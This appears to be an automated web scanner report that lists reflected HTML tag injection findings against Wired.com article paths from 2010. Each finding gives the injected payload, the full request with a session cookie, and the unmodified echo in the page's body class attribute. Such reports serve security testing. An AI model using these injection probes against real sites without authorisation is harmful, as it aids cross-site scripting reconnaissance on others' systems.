HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:12 GMT Date: Sun, 21 Nov 2010 23:12:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesb3b3d"><a>3ce8d2bac62 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56075"><a>6061ca3c823 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news56075"><a>6061ca3c823/2008/07/dayintech_0703 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:25 GMT Date: Sun, 21 Nov 2010 23:12:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news56075"><a>6061ca3c823"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db02"><a>f874204744b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science3db02"><a>f874204744b/discoveries/news/2008/07/dayintech_0709 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:03 GMT Date: Sun, 21 Nov 2010 23:12:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science3db02"><a>f874204744b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9fd1"><a>86c7e4de0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesd9fd1"><a>86c7e4de0c/news/2008/07/dayintech_0709 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:20 GMT Date: Sun, 21 Nov 2010 23:12:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesd9fd1"><a>86c7e4de0c c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><a>dbfd5c107d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb6b98"><a>dbfd5c107d/2008/07/dayintech_0709 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:33 GMT Date: Sun, 21 Nov 2010 23:12:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb6b98"><a>dbfd5c107d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff39c"><a>59bffd6a4f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceff39c"><a>59bffd6a4f8/discoveries/news/2008/08/dayintech_0812 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:03 GMT Date: Sun, 21 Nov 2010 23:12:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceff39c"><a>59bffd6a4f8 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 644ae"><a>6b5c8b0db9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries644ae"><a>6b5c8b0db9b/news/2008/08/dayintech_0812 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:19 GMT Date: Sun, 21 Nov 2010 23:12:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries644ae"><a>6b5c8b0db9b c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce779"><a>d1da1c60cd6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsce779"><a>d1da1c60cd6/2008/08/dayintech_0812 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:30 GMT Date: Sun, 21 Nov 2010 23:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsce779"><a>d1da1c60cd6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b19"><a>3c1f34f3de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb7b19"><a>3c1f34f3de/discoveries/news/2008/08/dayintech_0814 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:07 GMT Date: Sun, 21 Nov 2010 23:12:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb7b19"><a>3c1f34f3de ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9bda"><a>691a36c089b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa9bda"><a>691a36c089b/news/2008/08/dayintech_0814 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:24 GMT Date: Sun, 21 Nov 2010 23:12:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa9bda"><a>691a36c089b c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d6e"><a>917d98e62c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb8d6e"><a>917d98e62c1/2008/08/dayintech_0814 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:35 GMT Date: Sun, 21 Nov 2010 23:12:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb8d6e"><a>917d98e62c1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65655"><a>3b9c63b3795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science65655"><a>3b9c63b3795/discoveries/news/2008/09/dayintech_0909 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:53 GMT Date: Sun, 21 Nov 2010 23:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science65655"><a>3b9c63b3795 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62f1"><a>7d6cf2b9f7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesc62f1"><a>7d6cf2b9f7d/news/2008/09/dayintech_0909 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:11 GMT Date: Sun, 21 Nov 2010 23:12:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesc62f1"><a>7d6cf2b9f7d c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 565ee"><a>1a0dac16008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news565ee"><a>1a0dac16008/2008/09/dayintech_0909 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:22 GMT Date: Sun, 21 Nov 2010 23:12:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news565ee"><a>1a0dac16008"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c521b"><a>72e918e3af1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencec521b"><a>72e918e3af1/discoveries/news/2008/09/dayintech_0918 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:35 GMT Date: Sun, 21 Nov 2010 23:11:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencec521b"><a>72e918e3af1 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2adc6"><a>beef516bcac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries2adc6"><a>beef516bcac/news/2008/09/dayintech_0918 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:50 GMT Date: Sun, 21 Nov 2010 23:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries2adc6"><a>beef516bcac c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4249"><a>a52de65f3e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newse4249"><a>a52de65f3e1/2008/09/dayintech_0918 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:04 GMT Date: Sun, 21 Nov 2010 23:12:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newse4249"><a>a52de65f3e1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b0f"><a>3dff3cb2f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienced7b0f"><a>3dff3cb2f8/discoveries/news/2008/09/dayintech_0924 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:31 GMT Date: Sun, 21 Nov 2010 23:11:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienced7b0f"><a>3dff3cb2f8 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7f61"><a>3d1be35ff38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
